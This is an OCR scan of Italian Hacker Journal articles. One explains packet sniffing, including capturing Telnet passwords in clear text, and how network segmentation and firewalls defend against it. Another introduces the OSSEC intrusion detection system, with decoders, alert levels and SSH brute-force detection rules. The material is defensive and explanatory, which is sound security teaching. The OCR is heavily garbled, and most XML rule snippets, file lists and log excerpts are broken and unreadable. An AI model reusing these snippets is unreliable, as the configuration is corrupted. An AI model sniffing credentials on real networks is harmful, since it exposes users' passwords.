usati su IP, ma anche 
SPX se è presente 
l'IPX oppure il vecchio e 
glorioso NetBIOS, ormai in 
progressivo abbandono. 
Al livello più alto, 
applicativo, rileviamo i 
protocolli DNS, NPT, SNMP, 



POP, IMAP, FTP, IRC, HTTP, 
fino ad arrivare ai protocolli più 
oscuri utilizzati da applicazioni 
di nicchia. 



ABBIAMO LE 
IDEE CHIARE? 

E' proprio al livello applicativo 
che c'è il succo di quello che 
vogliamo scoprire. Arrivati a 
questo punto, possiamo citare 
tantissima letteratura che ci 
suggerisce come fare a rilevare 
le password, i numeri dì carta di 
credito oppure dati privati che 
dovrebbero restare nascosti. 
Se consideriamo ad esempio il 
Telnet, impostando i filtri su host 
server ed host client possiamo 
limitarci a catturare il traffico in 




transito sulla porta 23 del TCP. 
All'inizio della sessióne tra server 
e client avremo cosi modo di 
catturare la sequenza di caratteri 
Che contiene l'utente e password 
praticamente senza fare alcuno 
sforzo. 

In effetti, sono tutte cose 
tecnicamente molto semplici da 
realizzare attraverso l'uso di uno 
sniffer, ma non dimentichiamo 
che i dati ci devono passare 
davanti. Infatti sapere che il 
Telnet trasmette le password 
di autenticazione in chiaro un 
carattere alla volta, ci serve 
a poco se quel caratteri non 
passano davanti alla scheda 
ethernet sulla quale Insiste lo 
sniffer. Non dimentichiamo, 
inoltre, che i vecchi sistemi di 
comunicazione come Telnet 
e POP3, sono in progressivo 
abbandono a favore di Sistemi 
molto più avanzati come SSL, 
HTTPS, Kerberos e simili, per i 
quali i! discorso delle password in 
chiaro non vale più. Nonostante 
tutto, lo sniffer è uno strumento 
impareggiabile quando si 
vuole risolvere un problema 
di comunicazione. Sapere nel 
dettaglio che cosa Si dicono 
due applicazioni attraverso 
la rete può essere motto utile 
soprattutto per coloro che 
sviluppano le applicazioni 
e vogliono implementare 
meccanismi di traffico sempre 
più performanti. 
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sniffing 



!_□ SNIFFER E UNO STRUMENTO MOLTO POTENTE 
CHE PUÒ ESSERE UTILIZZATO PER ASCOLTARE 
E VEDERE CIÒ CHE, IN REALTÀ, SI VORREBBE 
PROTEGGERE. PER CAPIRE COME EVITARE 
L'ATTACCO DA PARTE DI UNO SNIFFER DOBBIAMO 
IMPARARE A CONOSCERE I MECCANISMI 
CHE REGOLANO IL TRAFFICO IN RETE 



i' f,y* " vi il*! 'i 



o impara 
usare uno sniffar. Lo 



abbiamo installato e 



siamo in grado di rac 
ogiiere le informazioni 
che ci interessano tra quelle in 
transito sulla rete. 
Adesso, almeno per una volta, 
dismettiamo i panni dell'hacker e 
posizioniamoci sull'altra sponda, 
dove siedono i famosi esperti di 
sicurezza. 

La priorità per un esperto di sicu- 
rezza è proteggere i dati, sempre e 
comunque. Purtroppo non si può 
sempre far ricorso al tunnelling 
vpn, crittografia, chiavi esotiche di 
cifratura e quant 'altro. In qualche 
caso ciò che viene trasmesso deve 
passare in chiaro e l'eventuale uso 
di uno sniffer, da parte di un non 
avente diritto, deve essere assolu- 



e evitato, 
er capire come proteggere il 
traffico di rete da occhi indiscreti 
dobbiamo partire dall'inizio, ossia 
da come è fatta una rete. 



SEGMENTI 
DI RETE 



Un segmento di rete consiste in 
un gruppo di macchine che condi- 
vidono traffico a bassissimo livel- 
lo, che tipicamente coincide con il 
segmento di collisione. Una volta 
fe reti erano formate da un unico 
cavo di rete coassiale che aveva 
un inizio ed una fine racchiusi tra 
due "tappi", ma erano frequenti i 
problemi perché bastava che un 
cavo fosse "toccato" dalla signora 



pulizie per interromperne il 
funzionamento. 

Successivamente le reti si sono 
evolute e grazio all'introduzione 
del multiport repeater i problemi, 
soprattutto dovuti ai collegamenti, 
sono diminuiti ma in entrambi i 
casi II funzionamento è il mede- 
simo. 

Tutte le schede dì rete parlano 
ed ascoltano, trasmettendo e 
ricevendo dati sulla medesima 
frequenza dello stesso filo, anche 
se in tempi diversi, dell'ordine di 
millisecondi. Quando due schede 
di rete trasmettono contempora- 
neamente si genera una collisione 
ed entrambe ritrasmettono i propri 
dati ripetendo successivamen- 
te il medesimo segnale. Tanto è 
minore il numero di collisioni in 
percentuale rispetto al numero di 
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pacchetti trasmessi, tanto 
maggiore è la performance 
della rete. j 
Va da se che quando i nodi 
sono troppi avviene ciò che I 
sappiamo in un luogo troppo 
affollato, ossia si crea un 
rumore di fondo che rende 
praticamente impossibile 
la conversazione tra due 
persone. Infatti, superato il K 
numero di 30 schede di rete f 
che insistono su! medesi- 
mo segmento di collisione, 1 
le performance degradano 
in maniera esponenziale al 
crescere del traffico. 
Per questo motivo, sono sta- 
ti inventati gli swìtch, detti 
anche bridge intelligenti, che 
anziché ripetere i segnali 
a basso livello verso tutti i 
nodi ed attendere che le col- 
lisioni regolino il traffico, si ' 
interpongono come un filtro 
lasciando passare solo i dati 
che interessano il nodo che si trova 
su quella determinata porta, creando 
di fatto un circuito virtuale tra chi 
trasmette e chi riceve. 
SII switch di questo tipo gestiscono 
al proprio interno una tabella ARP e 
sanno esattamente su quale porta si 
trova quella determinata scheda. Se 
un nodo vuole aprire una sessione, 
i segnali vengono copiati soie sulla 
porta interessata, nascondendo di 
fatto il traffico agli altri nodi. 



Itri nodi. 



IL PROTOCOLLO 
TCP/IP 



Esiste un aitro metodo per nascon- 
dere i dati. Attraverso l'uso del TCP/ 
IP un segmento di rete può coin- 
cidere con una subnet di indirizzi 
gestita da un router. Definire i confini 
di una subnet vuol dire rendere 
appartenenti al medesimo segmento 
un gruppo di host non solo a livel- 
lo fisico ma al livello di protocollo. 
Quando si parla di infrastruttura di 
rete occorre sempre avere in mente 
il modello ISO/OSI. Bisogna posizio- 
narsi mentalmente al livello di riferi- 
mento, considerando il livello fisico 
sul gradino più basso ed il livello 
applicativo al livello più alto, passan- 



do per diversi strati gestiti da uno o 
più protocolli di comunicazione. 
Detto questo, fate molta attenzio- 
ne perché due □ più subnet gestiti 
al livello 3 del protocollo TCP/IP 
possono tranquillamente condivide- 
re lo stesso segmento fisico di rete 
gestito dal secondo o primo livello. 
Infatti, è possibile utilizzare il me- 
desimo switch per gestire due 
diverse subnet, senza fare ricorso 
ad opzioni esotiche di qualche 
switch più costoso come ad esem- 
pio le LAN virtuali. In questo caso, i 
computer che appartengono ai due 
diversi gruppi potranno vedersi tra 
di loro ma non trasversalmente con 
i computer dell'altro gruppo. Per 
consentire l'apertura di un canale 
di comunicazione tra due computer 
appartenenti a due subnet diverse 
occorre configurare un router che 
generi un'appropriata tabella di in- 
st rad amento e che abbia la possibili- 
tà di raggiungere un indirizzo TCP/IP 
di entrambe le subnet. 
Non occorre che il router abbia due 
schede di rete e che ciascuna di 
esse abbia l'indirizzo TCP/IP definito 
all'interno di ciascuna delle due sub- 
net. E' possibile anche configurare 
sulla medesima scheda del router 
due indirizzi TCP/IP ciascuno appar- 
tenente ad una delle due subnet ed il 
gioco è fatto. 



La rete può diventare 
molto complessa. In quella 
esemplificata in questa figura, 
qualcuno sulla rate pubblica 
potrebbe anche posizionare 
uno sniffer ma sarebbe 
pressoché impossibile 
visualizzare il traffico 
che va dalla sala server 
alla rete privata. 



BARRIERE 
HARDWARE 



IPer rendere sicuro un segmen- 
to bisogna considerare prima 
gli altri segmenti a cui il primo 
è collegato. In un ufficio dove 
ci sono determinate regole per 
accedere, come ad esempio 
una sala server, è difficile in- 
stallare uno sniffer senza esse- 
re scoperti, Diverso è invece il 
caso di una sala pubblica dove 
è consentito il libero accesso. 
Pensiamo tipicamente ad una Uni- 
versità, dove esistono segmenti di 
Facoltà che dovrebbero rimanere 
privati e segmenti pubblici, come ad 
esempio la blbtioteca, dove entra e 
si collega chiunque. 
Ovviamente, l'uso di strumenti come 
Firewall e simili sono praticamente 
un obbligo. Seguendo I fattori di 
costo e di performance sarebbe 
molto più semplice coi legare tutte le 
macchino tra loro attraverso appa- 
rati economici, ma dal punto di vista 
della sicurezza questa soluzione è 
un pugno allo stomaco. 
In questo caso occorre racchiudere 
tutte le macchine ad accesso pub- 
blico in uno spazio ben delimitato, 
creando un solo ed unico collega- 
mento verso la sala server, adegua- 
lamenta presidiato da un firewall. 
In questo caso, i dati che viaggiano 
sul segmento sicuro dovrebbero 
quasi certamente restare inviolati 
anche se ci sono moltissimi fat- 
tori in gioco, come ad esempio la 
tipologìa degli edifici, la distanza 
tra gli apparati di rete ed il numero 
dì computer utilizzati. In ogni caso, 
ho usato il condizionale perché nel 
mondo dell'informatica, quando si 
parla di Sicurezza, il condizionale è 
obbligatorio. 
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SICUREZZA In duestd articolò presentiamo 

UN'INTRDDUZIDNE Al PRDCESSI DI DIFESA '\ 
AUTONOMI PER IL CDNTRDLLD DEL R1SCHID ED IL \ 
M □ N IT □ R A G G I □ DEI LOG CdN D55EC UTILIZZANDO 
□ pé"nB5D e dhl sua RACKET FILTER. 



I 'esponenziale crescita del 
mercato che mota attorno 
all'lnformation & Commu- 
I nication Technologies ed il 

■■■Vistoso aumenta di reti per 
l'interconnessione di sistemi infor- 
mativi, hanno delineato, nel corso 
degli anni, una radicale trasforma- 
zione del nostro modo di vivere 
che interessa ogni singola azione 
quotidiana. 

Alzarsi al mattino ed accompagnare 
il caffè leggendo la nostra casella di 
posta elettronica è un'operazione di 
prassi ormai, cosi come lo è gesti- 
re; centinaia o migliaia di contatti 
attraverso i vari social network ed 
i modèrni software di messaggeria 
istantanea. 

Se pensiamo poi ai sistemi di com- 
mercio elettronico, alla gestione 
dei conti correnti con un semplice 
click, all'opportunità di organizzare 
viaggi, prenotare aerei e quant'altro, 
giocare in borsa, pagare il casello 
autostradale e veicolare eccellen- 
temente pubblicità attraverso siti e 
portali, appare quantomeno scon- 
tato presumere che il monda dei 
bit sia qualcosa di molto meno 
astratto ed avulso dalla realtà 
rispetto a quello che si potreb- 
be pensare. 

Questo fiorente mercato ha avuto 
modo di creare nuove opportunità 
di lavoro, vere e proprie figure pro- 



fessionali che fino a qualche tempo 
fa non erano minimamente immagi- 
nabili. 

Se infatti fino a 20 anni fa la prero- 
gativa principale, in termini di risor- 
se umane, di un'azienda di medio- 
alto livello era quella di avvalersi 
di un buon General Manager, ora 
risulta del tutto parificata, in termini 
di importanza aziendale, la figura 
dell'IT Manager. 

In virtù di questo processo simbio- 
tico tra uomo e macchina diviene 
chiaro percepire come l'interesse 
alle tematiche relative al mondo del- 
la sicurezza informatica avvolga un 
po" tutti, addetti ai lavori e non. 

Anche sfruttando questa forte 
richiesta è stato creato un modello 
di business da zero: basti pen- 
sare all'industria dei produttori di 
software antivirus, firewall, IDS e via 
dicendo e alla continua nascita di 
aziende che fanno della sicurezza 
dell'informazione, della privacy e 
della gestione del rischio il loro core 
business. 

Ma quali sono le metodologie 
generalmente adottate per mo- 
nitorare costantemente lo stato 
di sicurezza di un'intera Infra- 
struttura IT ? Che cosa significa 
rendere sicura un'infrastruttura IT ? 
Più in generale, cosa si intende con 



il termine "sicurezza" ? 

In un articolo proposto su HJ 1 94 
abbiamo introdotto i tre pilastri 
fondamentali dell'IT Security che 
riprendiamo anche in questa sede, 
ovvero: confidenzialità, integrità e 
disponibilità. 

Offrire sicurezza significa quindi 
governare il rischio in base ad 
un'organizzazione tecnica e logi- 
stica che tenga conto di questi tre 
inscindibili presupposti e che utilizzi 
tutte le risorse disponibili (umane, 
software e hardware) per farlo, pre- 
supponendo che: 

Gli host del nostro network debbano 
essere accessibili solo da parte di 
chi è autorizzato. 
Le informazioni in essi contenuti 
debbano essere modificabili solo 
da chi autorizzato secondo schemi 
e modalità definite dall'Amministra- 
tore. 

Debbano essere sempre accessibili 
da parte di Chi è autorizzato. 

Il processo di Auditing si suddivi- 
de in fattore proattivo (analisi dei 
sistemi) e reattivo (sviluppo delle 
policy di sicurezza adeguate): 

individuare i principali punti focali 
del rischio, analizzando le maggiori 
Criticità della nostra infrastruttura e 
sviluppando un'opportuna strategia 
di contenimento costituisce un 



24 HACKER JOURNAL 




attributo fondamentale de! nostro 
percorso. 

Avendo già analizzato nel corso 
dei passati numeri della rivista le 
no e ali ti di attacco alle quali i nostri 
sistemi sono esposti e le metodolo- 
gie generalmente adottate da parte 
di incursori per farvi breccia (fattore 
proattivo), focalizzeremo la nostra 
attenzione su uno degli aspetti 
più cruciali: la definizione delle 
politiche atte alla gestione del 
rìschio (fattore reattivo), ricordan- 
doci che la protezione offerta deve 
essere direttamente proporzionale 
alle criticità rilevate in una prece- 
dente fase di auditing del nostro 
network, dall'interno e dall'esterno 
(valutando, quindi, le risposte ai 
penetration test effettuati), 



Vedremo quindi come i concetti alla 
baso del corretto monitoraggio 
dei log possano permetterci di rice- 
vere un immediato riscontro delle in- 
formazioni gestite dai nostri sistemi 
individuando i principali campanelli 
di allarme e come, attraverso questi, 
bloccare sul nascere accessi 
non autorizzati e tentativi di 
Incursione. 

Analizzeremo pertanto OSSEO, uno 
dei più potenti Host-based Intru- 
sion Detection System (HIDS) 
offerti dalla comunità del software 
libero osservando come, attraver- 
so l'ausilio del sistema operativo 
OpenBSD ed il suo firewall integra- 
to i P Fi sia possibile realizzare un 
complesso ed autonomo mecca- 
nismo di protezione perimetrale 



della nostra rete e degli host 
che la compongono. 



SCENARIO 

Considerata la totale promiscuità 
che caratterizza le reti di qualsiasi 
contesto aziendale medio/grande, 
ci preoccuperemo di realizzare una 
soluzione che trovi spazio in qual- 
siasi scenario lavorativo e che ben 
si presti ad essere interoperabile 
con svariate tipologie di OS ed 
architetture. 

Neila fattispecie analizzeremo una 
classica situazione operativa dove 
vedono configurarsi: un web server 
Apache, un servizio FTP, accesso 
SSH abilitato su n host, vari client 
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Microsoft Wl ndows 
e GNU/Linux, untile/ 
print server gestito 
con Samba, uno o 
più server di posta 
elettronica ed un 
server MySQL. 

Opteremo pertanto 
per una configura- 
zione dell'HIDS di 
tipo client/server 
(di seguito "c/s") 
demandando la ge- 
stione delle regole di 
filtraggio e degli alert 
ricevuti ad una macchi- 
na montante QpenBSD 4,6, 

Ci occuperemo, in una seconda 
fase, di rendere perfettamente sin- 
croni gli operati di PF e di OSSEO 
evidenziando come sia possibile, 
attraverso quella che è definita mo- 
dalità "Adiva Response", rendere 
le operazioni di log monitoring e 
blocco degli attacchi real-time per- 
fettamente autonome. 



ANALISI DEI LOG 

Sviluppato da Trend Micro e dispo- 
nibile con licenza GPL, al momento 
delia scrittura di questo articolo, 

l'ultima versione di OSSEC 
disponibile per ii download è la 

2.3. 

L'applicativo, in versione Client, fun- 
ziona su sistemi operativi Microsoft 
Windows, GMU/Linux, Solaris, BSD, 
AK ed HP/UX. Per quanto riguarda 
il Server, invece, la compatibilità è 
assicurata solo per OS Unix-like. 

Prima di procedere con l'installa- 
zione dei server e degli agenti sui 
nostri host (cosa che demanderemo 
al prossimo numero della rivista) e 
necessario chiarire come l'applica- 
tivo suddivide il proprio lavoro in 
modo estremamente modulare. 




Al momento dell'avvio OSSEC, 
infatti, definisce un set di demoni 
attivi sulla macchina con privilegi 
limitati al loro specifico uso: ognuno 
occuperà una specifica funzione. 

OSSEC Analysisd 
Questo modulo costituisce il cuore 
dell'applicativo occupandosi, come 
il nome stesso suggerisce, dell'ana- 
lisi dei log e degli eventi (tra poco 
vedremo su che presupposti e come 
è basata l'indagine sui log). 
Nell'installazione e/s il processo e 
collocato esclusivamente sul Server 
[che si presuppone èssere total- 
mente dedicato a questo utilizzo) la- 
sciando le risorse per gli applicativi 
operanti sui nostri client immutate. 
Nelle installazioni standalone è 
invece naturalmente avviato anche 
sui client (con un aggravio in termini 
di risorse). 

Attivo sui nostri client, si occupa di 
inviare le informazioni necessarie 
all'espletamento dell'analisi dei log 
al Server. Nell'installazione c/s è 
naturalmente collocato all'interno 
dell'agente (e quindi del Client). 

Disponibile sul server nell'installa- 
zione cfs, si occupa di coordinare le 
comunicazioni tra gli agenti [client) 
ed il server interfacciandosi diret- 



tamente al modulo 
Analysisd per la suc- 
cessiva verifica ed 
analisi delle informa- 
zioni ricevute dagli 
host della rete. 

OSSEC Monitord 
Compito del modulo 
è quello di controlla- 
re l'operato dei client 
(Agenti) ed archiviare 
tutti i log centralizza- 
ti prodotti in appositi 
archivi giornalieri. 



interfacciandosi con Montoni 
rappresenta l'effettivo worker atto 
al recupero dei log; per questo è 
naturalmente avviato con privilegi 
amministrativi. 

OSSEC Execd 
e Maild 

Com'è facile intuire, questi ultimi 
moduli si occupano dell'invio degli 
aiert via posta elettronica [vedremo 
di seguito come) e dell'attivazione 
dei processi di difesa necessari, 
identificati in OSSEC sotto il nome 
di "Active response" (attivazione del 
firewall, inserimento host attaccanti 
in hosts.deny, scrittura delle regole 
di filtraggio opportune in caso di 
attacco direttamente nel file di con- 
figurazione del firewall). 

Risulta a questo punto facile com- 
prendere come il processo di log 
monitoring effettuato da OSSEC 
poggi le basi su un'efficiente strate- 
gia modulare all'interno della quale 
Si colloca un'intera catena produtti- 
va che tiene conto del recupero dei 
log (log colleotor), dell'invio di questi 
ultimi al server (agentd e remoted), 
dell'analisi degli stessi (analysisd), 
della segnalazione tempestiva detle 
criticità rilevate (maild) e dell'at- 
tivazióne di meccanismi di difesa 
autonomi secondo schemi e modali- 
tà prefissate (execd). 
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Quest'ultimo punto trasforma di 
latto l'applicativo da IDS ad IPS. 
Torneremo sull'argomento anche 
riprendendo alcuni concetti relativi a 
PF già visti nei numeri passati della 
rivista. 



DECDDERS 

Tutti sappiamo che i file di log 
possono contenere una quantità di 
informazioni considerevole e che 
non tutte sono di nostro interesse. 
Avere un sistema, centralizzato di log 
monitoring può fendere sicuramen- 
te l'analisi delie stesse molto più 
efficiente e permetterci di avere un 
quadro della situazione circostan- 
ziale mirato ed aggiornato in tempo 
reale. Ma come è reso possibile ciò? 



Il parsi ng dei log è effettuato come 
abbiamo detto poeanzi dall'apposito 
modulo c Analysisd" in stretta siner- 
gia con i dati raccolti dai vari agenti. 
Approfondiamo quindi il discorso 
vedendo come sia effettivamente 
effettuata l'analisi delle informazioni 
raccolte. 

Il processo è suddiviso in tre singole 
fasi: pre-decodifica, decodifica 
ed analisi. 

Nella prima, le informazioni ri' 
cevirte dai singoli agenti e dal 
server stesso sono parsale dal 
demone alla ricerca di "informa- 
zioni chiave" quali orario, nome 
dell'applicazione, nome del sistema. 

Nella seconda e terza fase viene 
analizzata, attraverso t'utilizzo di 
espressioni regolari, la restante 
parte del log nel dettaglio alla 
ricerca di informazioni quanto 
più esaustive possibili riguardo 
al significato semantico dei ri- 
scontri rilevati (indirizzi ip, userna- 
me, errori, etc). 

Per capire meglio, esaminiamo un 
tipico decoder, nella fattispecie 





quello relativo al server web Apa- 
che, comprendendone il significato 
e l'impostazione: 

edécsder 3:-~nè" ff apaehe-errorlog' r ,* 



^/decoder» 

^decoder nane="apachE-errcr:cg" j 

<prereatch> A [warn] | * ^noticej - 
l'Ierrci] «/preir.atch> 

<decoder name="apacbe-errorlog-i 



':>apache-errorlog?/pa 



* presateli ot£set="af ter_ . 
patsnfs'' [cl:ent'/preTnatcri> 

•iregex offset»" aftor_pre-> 
Batch":/ :\d*.\d+-.'\d+. \d+) ] <J , 

<ord£r>sreipif/crdf;v-< 
t/decodefs 

Il primo blocco di istruzioni identi- 
fica univocamente l'applicativo di 
nostro interesse da tenere "sotto 
controllo": in questo caso, trattan- 
dosi di Apache, saranno presi in 
considerazione i processi identificati 
dal nome "httpd". 

Nel secondo blocco sono definite le 
operazioni di decodifica accennate 
prima; sono infatti analizzate le in- 
formazioni da monitorare all'interno 
dei log di errore del v/eb server Apa- 
che che rispondano a tre determina- 
te regexp (vuarn, noti ce ed errar). 

Nel terzo ed ultimo blocco si con- 
figura la ricerca dell'IP all'interna 
del medesimo file di log solo dopo 
l'analisi condotta dal secondo 
blocco e solo se vi sia presente un 
chiaro riferimento all'indirizzo stesso 
([client "IP* Jf; 

Se analizziamo brevemente un tipi- 
co stralcio di log di Apache diventa 
molto più semplice capire il signi- 
ficato del decoder e la sua doppia 



analisi con regexp: 

[eri Mar 5 23: 15 ; 33 2010] ter 
rorj tCli«nt 91." .247 .**] Filo, 
doas ngt ejiist: . . . 



Risulta evidente a questo punto 
il senso delle espressioni regola- 
ri: nella prima parte {| Fri Mar 5 
23 :is: di mi;]) troviamo un chia- 
rissimo riscontro orario (oggetto di 
analisi net processo di pre-deeodifi- 
ca); nella seconda ([.-rari) trovia- 
mo una delle tre opzioni contempla- 
te nel secondo blocco del decoder 
ed oggetto dell'analisi dì decodifica 
relative, alla tipologia del messaggio 
(in questo caso di errore); nella terza 
(tciisnt 33. +«.247. .**].) si comple- 
ta il processo di decodifica avendo 
individuato anche l'IP di provenien- 
za attraverso i'ok ricevuto dall'ap- 
posita regexp; nella quarta ed ultima 
parte si snoda il processo di analisi 
semantica (il significato del messag- 
gio è reso chiaro direttamente dal 
testo che accompagna il log: "Fii* 
does net sxìst/l). 

Come facilmente intuibile, risulta de- 
cisamente semplice creare decoder 
ir formato XML contenenti espres- 
sioni regolari personalizzate per 
Software specifico o semplicemente 
per analizzare dettagliatamente 
eventi e file. 



LIVELLI DI ALLERTA 

Fin qui abbiamo definito tutto il 
necessario per capire il modo dì 
interfacciali ai software da par- 
te dell'applicativo completando il 
discorso alla base del monitoraggio 
dei log. Ma OSSEO è ben altro e 
consente di stendere un profilo del 
rischio attraverso i riscontri ricevuti 
dall'analisi dei log definendo op- 
portuni "livelli di allerta" crescenti in 
base alle problematiche riscontrate. 

L'operato dell'applicativo è infat- 
ti disciplinato da un set di regole 
predefinito. 
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li formato utilizzato per la definizio- 
ne del modello di lettura e analisi 
dei log è anche in questo caso il co- 
mune XML e trovano spazio schemi 
pronti all'uso per la quasi totalità 
dei software Open Source (Apache, 
Mysql, Squid. Sendmail, Samba) e 
buona fetta di soluzioni commerciali 
come Antivirus, MS Exchange e 
firewall (vedi box). 

BOX Ut: BUILT-IN RULES PRESENTI 
NELL'INSTALLAZIONE DI BASE 

a$acbe ru'.tJE.xml 
rcysql^rules.xn'.l 
soli icvall_ l'ili es . xml 
arpwjtch rules.xir.l 
runcd_L-ules.xml 
gpssidt ni le e, xml 
asteiì sk_t-ules.xnil 
net sci~ee:if w_rul i>s . xml 
«gijid rcles . xul 

Htcìck ro Jesi, xml 

ngìtix uiles, xml 

sshii_niles.x(Kl 

cisco- io5_mles . xml 

ossee rules.xml 

syiìftiìiUtìL' Liv- riiltia.xml 

cenuri»- rules.xml 

p,ìm_niles.xuil 

sviami ne-vi-s_L'uleB . xml 

dovi!ooc_t'ules . xml 

pKp^'ultfa . Sattl 

kykUxj rules.xml 

!iv(?K4ll_i.T.!le , s.sral 

pix rulee.KF.l 

telneed mitis.xml 

ftprì_rule&.xml 

poi i i'v miss. xml 

hardeimp rules.xml 

postfixrules.xmi 

trcmslated 

tretid-osceriilos . xml 

ids ruletì.xnl 

pust^vì-iil -uie;i .xml 

vrcipopld_ruìes.xml 

imapd rules.xml 

prof Lpd_tnl t2G . xml 

v»w.ii-fi_t'ul*s . xml 

Lix'-lìI rulef . ,vrnl 

pure-ftpd vules.xml 

vpi* concentrateli- rules.xml 

nuli acume r rul cs . xml 

rwsjon L'iil.>B.xml 



vpapn-.H ■. 1 iiiles.xml 
mcal ee_Liv_ruIds .xml 
rauadcufecj.'uliis.xml 
vaftpd rulcG.xml 
M >WWl>IÌgl ruleB.xrel 
™ii«s_i;flnfig.xm.l 
web calM.xoii 
ms_dhcp_rules . xml 
«endmail l'ules .xml 
woudpres s_rules , xml 
US f tpd_i'iiLc!s. vi' 
smbdnilps.Xiiil 
zeug_rule3.xnil 

solarls_ha¥._rule>a.xml 

Senza perderci in inutili chiacchiere 
consideriamo come prima un esem- 
pio pratico (stavolta con SSH) ed 
una delle tante regole predefinite dal 
software (sshd_nj|es.xml). 

Prima di procedere introdueiame- 
però ateune nozioni di base che ci 
consentiranno di capire meglio i 
discorsi a seguine, 

Ogni regola definita con OSSEC pre- 
vede un identificativo unico variabile 
da 100 a 99999. 

Il livello di allerta definibile sulla 
singola regola varia da un minimo 
di 0 ad un massimo di 15 (in ondine 
ovviamente crescente rispetto al 
rischio individuato). 
Qualora non volessimo essere 
informati Circa un riscontro ad una 
determinata regola è in ogni caso 
possibile definire l'apposita opzione 
'noalerf. indipendentemente dal 
livello di allerta stabilito. 
Per limitare l'insorgenza di falsi 
positivi è possibile definire alcuni 
parametri specifici: è ad esempio 
consigliabile individuare una certa 
frequenza nei log prima di generare 
un aiert attraverso l'apposita opzio- 
ne "frequency" così come potrebbe 
essere interessante analizzare spe- 
cifici archi temporali tra un errore e 
l'altro con la direttiva "timeframe\ 
Generato un aiert, è inutile generar- 
ne un'altro per la stessa evenienza 
in un arco temporale ristretto che 
presupporrebbe lo stesso riscontro; 



a tal fine può rivelarsi utile l'adozio- 
ne della direttiva "ignore" nei corpo 
della regoia. 



Detto questo, passiamo all'analisi 
di una delle tante regole per SSH, 
come sopra menzionato, che meglio 
chiarifichi i punti appena citati, 
occupandosi, nello specifico, di in- 
dividuare i tentativi di accessi brute 
force (più in là vedremo anche come 
bloccarli sul nascere): 

ernie id="B700" level="0" 
noalett»*l"» 

<deccded_aa>aatKk/deco 

dsd_as? 

<d*srripti.en>SSHD i 
messjgas grsuped . «/description» 
< /i'ule> 

In questo primo blocco definiamo 
l'ìd univoco da assegnare ad un 
semplice contenitore di messaggi 
relativi a SSH (e quindi indenfifl- 
oati attraverso l'apposito decoder, 
come visibile alla seconda riga] 
definendo un livello di allerta minimo 
(level="0") e la non notifica dello 
stesso (noalert="1 B ). 

Questo ci servirà per realizzare 
alcune regole "a catena" attraverso 
l'apposita direttiva "if_sid" ohe ve- 
dremo di seguito. In altre parole, 
realizzeremo un set di regole 
concatenato del tipo: 

1 - Processo SSH attivo (no aiert) - 
ID: S700 

2 - Login (no aiert) 

3 - Login errato (primo aiert, sem- 
plicemente: 'Accesso negato") - ID: 
5710<>S700 

4 - Fino al quinto login errato nell'ar- 
co di 2 minuti, stesso IP (stesso 
discorso] - ID: 5710 < > 5700 

5 - Sesto login errato in 2 minuti, 
stesso IP (nuovo aiert, brute force in 
corso) - ID: 5712 <> 5710 <> 5700 



Procediamo quindi con il secondo 
blocco Ipunto 3 del nostro set di 
regole}: 





<rule id="5710 w ievel""!^? 

<àf_sid>57!>05/ir_sid> 

smatoh^illficfil 
user | invalid user.; /match:* 

«deeeriptionsAtténpt so 
login lisina a Ron-eitister.t 



s/rule> 



,nvalid_ ■ 

acion_faile<5,i,i 



Qui definiamo il primo aiert genera- 
to in caso di fogin errato. Vediamo 
quindi l'uso sella direttiva "if_sid" 
accennata prima, vetta a definire 
la relazione di dipendenza con la 
regola 5700 {del resto, un errore 
relativo all'autenticazione su SSH 
difficilmente potrebbe generarsi se il 
servizio non fosse attivo). 

Attraverso la direttiva "match" scri- 
viamo quindi l'apposita espressione 
regolare finalizzata all'identificazione 
dei la problematica in essere. Questa 
definisce esattamente le parale da 
ricercare all'Interno dei log generati 
dal software preso in considerazio- 
ne (in questo caso SSHd) affinché 
sia richiamata la regola stessa. 

Nel tag de scripti on invece offria- 
mo una descrizione di significato 
compiuto che sarà poi riportata 
sull'alert vero e proprio, in ultima 
istanza, alla vece "group", definia- 
mo la tipologia entro cui ia regola 
prende forma. 

Vediamo quindi l'ultimo blocco (pun- 
to 5 de! nostro sei di regole): 

trule ìd."5712" levsi*"13" 

f req'jency- " 5 W timeEraTte^ 120*^ 

tif_iuatched_5id=5710c/ 
àf_matched_sid.- 

<;descrìpticn;S£EIG brute • 
Jsrce trying to ge^ access to 
the syaten . < /d-escripzion> 

taame_Eouroe_ip /> 

<group>autheTrtication_ ■ 
ÉallureE , ^/croup? 



Per questo blocco [che rappresenta 
sostanzialmente un'integrazione del 
seconde), come ci aspettavamo, la 
relazione di dipendenza è impostata 
con la regola 571 0 ma stavolta è 
più forte, ereditando attraverso la 
direttiva 'if.matched sid" tutto il 
corpo-regola definito prima ed ag- 
giungendo ulteriori specifiche. 

Presenta un livello di allerta ele- 
vato (1 0) e viene attivata uni- 
camente dopo 6 riscontri aila 
regoia 5710 (frequency= I, 6") 
generati in una frazione di 2 minuti 
(timeframe= n 120 B } . 
Scattato i'alert, infine, il sistema non 
riconsidererà la regola per un minu- 
to (ignore="60 ,t ). 

L'utilizzo della direttiva "sa me 
soureejp" determina l'attivazio- 
ne del blocco solo in presenza di 
richieste provenienti daiio stesso IR 
I tag "deacription" e "group" si com- 
mentano a questo punto da soli. 



L'ALERT GENERATO 

In tre semplici passaggi abbiamo 
definfto una precisa metodologia 
per l'individuazione dei tentativi di 
accesso non autorizzati via SSH ai 
nostri host. Vediamo quindi un tipico 
alert inviato dal demone "maild" alla 
nostra casella di posta elettronica 
durante un tentativo di attacco brute 
forco: 

OSSEE HIDS Sotmcation. 
2C1Q Mar 07 00:58:U4 

Ra«ived ?rom; www -> /va*/ log/ 
authLog 

I- il": "57;; firsd (level 10} -■> 

"SSHD brute force trying Lo get 
acceso to th« system." 
Portion of che lcg(s): 

Kar 7 00:59-03 w eshd [226431 : 
Failed password for invaliti user 
rarine frren 123.125.127.207 psrt 



Invalid user marir.e 
125, 125. 127. 207 
Mar 7 CD:57;59 wwk 
Failad password tor 
marine from 123. 12S 
3 14 SL ssh2 
Mar 7 30:57:59 w 
Invalid assi marine 
123. 1Ì5.Ì 57,207 
K*l 7 0S:57:54 www 
Fa il ed password for 
marine Ersm 123.125 
28 OSI ssh2 
Mar 7 C3.-57.54 www 
invalid user marino 
123,125.127.207 
Mar 7 00:57:50 www 
Failed password for 
narice frora 12 3,125. 
246-63 sah2 



sshdf22643] : 
fiorn 

sshd[53fl2j : 
invalid user 
227.207 port 

sehd[5382] : 



sshd[2955p; : 
ir.valicl tiEST 
,127,2 07 "crt 



sshd [23552] : 



sshd;iS392] : 
invalid user 
127. 2C7 port 



Come immaginavamo, nell'alert, ol- 
tre i dettagli del caso, è riportato un 
chiaro riferimento alla regola 5712 
